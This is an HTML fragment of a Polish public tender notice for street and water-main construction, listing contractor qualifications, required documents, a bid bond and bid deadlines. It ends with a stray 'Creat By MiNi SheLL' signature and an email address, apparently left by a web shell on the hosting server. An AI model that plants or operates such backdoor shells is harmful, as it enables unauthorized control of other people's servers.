class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ZDOLNOŚĆ TECHNICZNA LUB ZAWODOWA <br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. <br/>I. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy skierują do realizacji zamówienia publicznego osoby posiadające uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalnościach: <br/>- 1 - osoba - inżynieryjnej drogowej; <br/>- 1 - osoba - instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych; <br/>- 1 - osoba - instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych; <br/>- 1 - osoba - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych; <br/>- 1 - osoba - uprawnienia geodezyjne w dziedzinie geodezji i kartografii w zakresie geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i inwentaryzacyjnych oraz rozgraniczeń i podziałów -nieruchomości;<br/>- osobę pełniącą funkcje kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń (lub odpowiadające im uprawnienia a wydane na podstawie wcześniej obowiązujących przepisów). Dopuszcza się łączenie funkcji kierownika budowy oraz kierownika robót drogowych;<br/>- osobę odpowiedzialną za dokonywanie rozliczeń finansowych.<br/>Uwaga: <br/>Osoby kierujące robotami budowlanymi powinny posiadać uprawnienia budowlane bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2016 r. poz. 290 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jedn. Dz. U. z 2014 r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65). <br/><br/>II. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące zdolności technicznej lub zawodowej i w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali (zakończyli) przynajmniej:<br/>- jedno zadanie w zakresie budowy lub przebudowy lub rozbudowy drogi o przekroju ulicznym na terenie miasta wraz z oświetleniem ulicznym oraz kanalizacją deszczową o wartości minimum 6.000.000,00 PLN brutto oraz<br/>- jedno zadanie polegające na budowie lub przebudowie sieci wodociągowej wraz <br/>z przyłączami, o długości min. 400 m.<br/>Zamawiający dopuszcza potwierdzenie spełniania warunku określonego w pkt II w ramach jednego zadania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie dotyczące przesłanek wykluczenia postępowania należy wypełnić i podpisać przez osoby (osobę) uprawnioną i złożyć wraz z ofertą w dniu składania ofert. Załącznik nr 2.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">OŚWIADCZENIE DOTYCZĄCE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU<br/>Oświadczenie dotyczące spełniania warunków udziału w postępowaniu należy wypełnić i podpisać przez osoby (osobę) uprawnioną i złożyć wraz z ofertą w dniu składania ofert. Załącznik nr 3.<br/><br/>WYKAZ OSÓB<br/>Na potwierdzenie spełnienia warunku należy przedstawić wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami podpisany przez osobę/y uprawnioną/e sporządzony na podstawie załącznika nr 4 do swz.<br/><br/>WYKAZ ROBÓT BUDOWLANYCH<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca przedstawi podpisany przez osobę/y uprawnioną wykaz robót budowlanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów na rzecz których roboty te zostały wykonane, oraz z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, <br/>na rzecz którego roboty budowlane zostały wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. Załącznik nr 5.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> ZOBOWIĄZANIE PODMIOTÓW TRZECICH DO ODDANIA DO DYSPOZYCJI NIEZBĘDNYCH ZASOBÓW<br/>Zobowiązanie podmiotów, na zdolnościach lub sytuacji których Wykonawca polega, do oddania <br/>mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Należy wypełnić, podpisać przez osobę (osoby) uprawnione i w oryginale złożyć wraz z ofertą w dniu składania ofert. Załącznik nr 6.<br/><br/>OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O ZAMÓWIENIE<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które usługi wykonają poszczególni wykonawcy. Załącznik nr 7.<br/><br/>KOSZTORYS OFERTOWY<br/>Należy przedłożyć kosztorys ofertowy w formie uproszczonej wykonany zgodnie z obowiązującymi przepisami, oraz odrębny wykaz czynników cenotwórczych (R, Kp, Z, M, S). Dokumenty należy wypełnić i podpisać przez osoby (osobę) uprawnioną i złożyć wraz z ofertą .<br/><br/>ZESTAWIENIE KOSZTORYSÓW<br/>Zestawienie należy wypełnić, podpisać przez osoby (osobę) uprawnioną i w oryginale złożyć wraz z ofertą. Załącznik nr 10. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 100000,00 PLN <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z pkt 8.6) SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmian umowy w zakresie i na określonych warunkach wskazanych w załączniku nr 8 -WZÓR UMOWY <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-14 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/mzd/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-14 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com